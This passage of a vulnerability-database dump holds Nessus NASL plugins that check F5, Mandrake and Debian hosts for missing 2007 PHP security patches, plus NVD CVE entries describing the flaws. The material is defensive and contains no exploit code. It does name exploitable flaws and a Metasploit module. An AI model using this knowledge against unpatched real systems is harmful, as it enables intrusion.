audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-imap / php-ldap / php-manual / php-mysql / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:19:50", "bulletinFamily": "scanner", "description": "The remote BIG-IP device is missing a patch required by a security\nadvisory.", "modified": "2019-01-04T00:00:00", "published": "2014-10-10T00:00:00", "id": "F5_BIGIP_SOL7859.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78215", "title": "F5 Networks BIG-IP : Multiple PHP vulnerabilities (SOL7859)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL7859.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78215);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2007-0455\", \"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1286\", \"CVE-2007-1583\", \"CVE-2007-1711\", \"CVE-2007-1718\", \"CVE-2007-1846\", \"CVE-2007-1864\", \"CVE-2007-2509\");\n script_bugtraq_id(22764, 22765, 23016, 23145, 23212, 23357, 23813, 23818);\n\n script_name(english:\"F5 Networks BIG-IP : Multiple PHP vulnerabilities (SOL7859)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote BIG-IP device is missing a patch required by a security\nadvisory.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K7859\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution 
SOL7859.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/09/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! 
get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL7859\";\nvmatrix = make_array();\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"9.2.0-9.2.5\",\"9.3.0\",\"9.4.0\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"9.3.1\",\"9.4.1-9.4.8\",\"10\",\"11\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"9.2.2-9.2.5\",\"9.3.0\",\"9.4.0\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"9.3.1\",\"9.4.1-9.4.8\",\"10\",\"11\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"9.2.2-9.2.5\",\"9.3.0\",\"9.4.0\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"9.3.1\",\"9.4.1-9.4.8\",\"10\",\"11\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"9.0.0-9.2.5\",\"9.3.0\",\"9.4.0\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"9.3.1\",\"9.4.1-9.4.8\",\"9.6.0-9.6.1\",\"10\",\"11\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"9.4.0\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"9.4.1-9.4.8\",\"10\",\"11\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.8, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:07:17", "bulletinFamily": "scanner", "description": "A heap-based buffer overflow vulnerability was found in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution\n(CVE-2007-1001).\n\nA DoS flaw was found in how PHP processed a deeply nested array. A\nremote attacker could cause the PHP interpreter to crash by\nsubmitting an input variable with a deeply nested array\n(CVE-2007-1285).\n\nA vulnerability in the way the mbstring extension set global variables\nwas discovered where a script using the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection\n(CVE-2007-1583).\n\nA vulnerability in how PHP's mail() function processed header data was\ndiscovered. If a script sent mail using a subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\nemail to unintended recipients (CVE-2007-1718).\n\nA buffer overflow in the sqlite_decode_function() in the bundled\nsqlite library could allow context-dependent attackers to execute\narbitrary code (CVE-2007-1887).\n\nUpdated packages have been patched to correct these issues. Also note\nthat the default use of the Hardened PHP patch helped to protect\nagainst some of these issues prior to patching.", "modified": "2018-12-05T00:00:00", "published": "2007-04-30T00:00:00", "id": "MANDRAKE_MDKSA-2007-089.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25113", "title": "Mandrake Linux Security Advisory : php (MDKSA-2007:089)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2007:089.
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25113);\n script_version (\"1.16\");\n script_cvs_date(\"Date: 2018/12/05 20:31:23\");\n\n script_cve_id(\"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1583\", \"CVE-2007-1717\", \"CVE-2007-1718\", \"CVE-2007-1887\");\n script_bugtraq_id(22764, 23016, 23145, 23357);\n script_xref(name:\"MDKSA\", value:\"2007:089\");\n\n script_name(english:\"Mandrake Linux Security Advisory : php (MDKSA-2007:089)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow vulnerability was found in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution\n(CVE-2007-1001).\n\nA DoS flaw was found in how PHP processed a deeply nested array. A\nremote attacker could cause the PHP interpreter to crash by\nsubmitting an input variable with a deeply nested array\n(CVE-2007-1285).\n\nA vulnerability in the way the mbstring extension set global variables\nwas discovered where a script using the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection\n(CVE-2007-1583).\n\nA vulnerability in how PHP's mail() function processed header data was\ndiscovered.
If a script sent mail using a subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\nemail to unintended recipients (CVE-2007-1718).\n\nA buffer overflow in the sqlite_decode_function() in the bundled\nsqlite library could allow context-dependent attackers to execute\narbitrary code (CVE-2007-1887).\n\nUpdated packages have been patched to correct these issues. Also note\nthat the default use of the Hardened PHP patch helped to protect\nagainst some of these issues prior to patching.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/18\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandrake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.1.6-1.7mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"libphp5_common5-5.1.6-1.7mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-cgi-5.1.6-1.7mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-cli-5.1.6-1.7mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-devel-5.1.6-1.7mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-fcgi-5.1.6-1.7mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-gd-5.1.6-1.2mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"php-mbstring-5.1.6-1.1mdv2007.0\", yank:\"mdv\")) flag++;\nif
(rpm_check(release:\"MDK2007.0\", reference:\"php-sqlite-5.1.6-1.1mdv2007.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:07:17", "bulletinFamily": "scanner", "description": "Several remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CVE-2007-1286\n Stefan Esser discovered an overflow in the object\n reference handling code of the unserialize() function,\n which allows the execution of arbitrary code if\n malformed input is passed from an application.\n\n - CVE-2007-1380\n Stefan Esser discovered that the session handler\n performs insufficient validation of variable name length\n values, which allows information disclosure through a\n heap information leak.\n\n - CVE-2007-1521\n Stefan Esser discovered a double free vulnerability in\n the session_regenerate_id() function, which allows the\n execution of arbitrary code.\n\n - CVE-2007-1711\n Stefan Esser discovered a double free vulnerability in\n the session management code, which allows the execution\n of arbitrary code.\n\n - CVE-2007-1718\n Stefan Esser discovered that the mail() function\n performs insufficient validation of folded mail headers,\n which allows mail header injection.\n\n - CVE-2007-1777\n Stefan Esser discovered that the extension to handle ZIP\n archives performs insufficient length checks, which\n allows the execution of arbitrary code.", "modified": "2018-11-10T00:00:00", "published": "2007-04-30T00:00:00", "id": "DEBIAN_DSA-1282.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25099", "title": "Debian 
DSA-1282-1 : php4 - several vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1282. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25099);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/10 11:49:33\");\n\n script_cve_id(\"CVE-2007-1286\", \"CVE-2007-1380\", \"CVE-2007-1521\", \"CVE-2007-1711\", \"CVE-2007-1718\", \"CVE-2007-1777\");\n script_xref(name:\"DSA\", value:\"1282\");\n\n script_name(english:\"Debian DSA-1282-1 : php4 - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. 
The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CVE-2007-1286\n Stefan Esser discovered an overflow in the object\n reference handling code of the unserialize() function,\n which allows the execution of arbitrary code if\n malformed input is passed from an application.\n\n - CVE-2007-1380\n Stefan Esser discovered that the session handler\n performs insufficient validation of variable name length\n values, which allows information disclosure through a\n heap information leak.\n\n - CVE-2007-1521\n Stefan Esser discovered a double free vulnerability in\n the session_regenerate_id() function, which allows the\n execution of arbitrary code.\n\n - CVE-2007-1711\n Stefan Esser discovered a double free vulnerability in\n the session management code, which allows the execution\n of arbitrary code.\n\n - CVE-2007-1718\n Stefan Esser discovered that the mail() function\n performs insufficient validation of folded mail headers,\n which allows mail header injection.\n\n - CVE-2007-1777\n Stefan Esser discovered that the extension to handle ZIP\n archives performs insufficient length checks, which\n allows the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1521\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-1777\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.debian.org/security/2007/dsa-1282\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the PHP packages. Packages for the arm, m68k, mips and mipsel\narchitectures are not yet available. They will be provided later.\n\nFor the oldstable distribution (sarge) these problems have been fixed\nin version 4.3.10-20.\n\nFor the stable distribution (etch) these problems have been fixed in\nversion 4.4.4-8+etch2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"libapache-mod-php4\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libapache2-mod-php4\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-cgi\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-cli\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-common\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-curl\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-dev\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-domxml\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-gd\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-imap\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-ldap\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-mcal\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-mhash\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-mysql\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-odbc\", reference:\"4.3.10-20\")) 
flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-pear\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-recode\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-snmp\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-sybase\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"php4-xslt\", reference:\"4.3.10-20\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libapache-mod-php4\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libapache2-mod-php4\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-cgi\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-cli\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-common\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-curl\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-dev\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-domxml\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-gd\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-imap\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-interbase\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-ldap\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-mcal\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-mcrypt\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-mhash\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-mysql\", 
reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-odbc\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-pear\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-pgsql\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-pspell\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-recode\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-snmp\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-sybase\", reference:\"4.4.4-8+etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"php4-xslt\", reference:\"4.4.4-8+etch2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}], "cve": [{"lastseen": "2018-11-01T05:11:28", "bulletinFamily": "NVD", "description": "Multiple integer overflows in the (1) createwbmp and (2) readwbmp functions in wbmp.c in the GD library (libgd) in PHP 4.0.0 through 4.4.6 and 5.0.0 through 5.2.1 allow context-dependent attackers to execute arbitrary code via Wireless Bitmap (WBMP) images with large width or height values.", "modified": "2018-10-30T12:25:35", "published": "2007-04-05T20:19:00", "id": "CVE-2007-1001", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1001", "title": "CVE-2007-1001", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-18T15:06:08", "bulletinFamily": "NVD", "description": "Double free vulnerability in the unserializer in PHP 4.4.5 and 4.4.6 allows context-dependent attackers to execute arbitrary code by overwriting variables pointing to (1) the GLOBALS 
array or (2) the session data in _SESSION. NOTE: this issue was introduced when attempting to patch CVE-2007-1701 (MOPB-31-2007).", "modified": "2018-10-16T12:40:34", "published": "2007-03-26T21:19:00", "id": "CVE-2007-1711", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1711", "title": "CVE-2007-1711", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-01T05:11:29", "bulletinFamily": "NVD", "description": "CRLF injection vulnerability in the mail function in PHP 4.0.0 through 4.4.6 and 5.0.0 through 5.2.1 allows remote attackers to inject arbitrary e-mail headers and possibly conduct spam attacks via a control character immediately following folding of the (1) Subject or (2) To parameter, as demonstrated by a parameter containing a \"\\r\\n\\t\\n\" sequence, related to an increment bug in the SKIP_LONG_HEADER_SEP macro.", "modified": "2018-10-30T12:25:35", "published": "2007-03-27T20:19:00", "id": "CVE-2007-1718", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1718", "title": "CVE-2007-1718", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-10-18T15:06:07", "bulletinFamily": "NVD", "description": "Buffer overflow in the gdImageStringFTEx function in gdft.c in GD Graphics Library 2.0.33 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted string with a JIS encoded font.", "modified": "2018-10-16T12:32:52", "published": "2007-01-30T12:28:00", "id": "CVE-2007-0455", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0455", "title": "CVE-2007-0455", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-18T15:06:08", "bulletinFamily": "NVD", "description": "Integer overflow in PHP 4.4.4 and earlier 
allows remote context-dependent attackers to execute arbitrary code via a long string to the unserialize function, which triggers the overflow in the ZVAL reference counter.", "modified": "2018-10-16T12:37:48", "published": "2007-03-06T15:19:00", "id": "CVE-2007-1286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1286", "title": "CVE-2007-1286", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-01T05:11:29", "bulletinFamily": "NVD", "description": "The Zend Engine in PHP 4.x before 4.4.7, and 5.x before 5.2.2, allows remote attackers to cause a denial of service (stack exhaustion and PHP crash) via deeply nested arrays, which trigger deep recursion in the variable destruction routines.", "modified": "2018-10-30T12:25:35", "published": "2007-03-06T15:19:00", "id": "CVE-2007-1285", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1285", "title": "CVE-2007-1285", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-11-01T05:11:29", "bulletinFamily": "NVD", "description": "The mb_parse_str function in PHP 4.0.0 through 4.4.6 and 5.0.0 through 5.2.1 sets the internal register_globals flag and does not disable it in certain cases when a script terminates, which allows remote attackers to 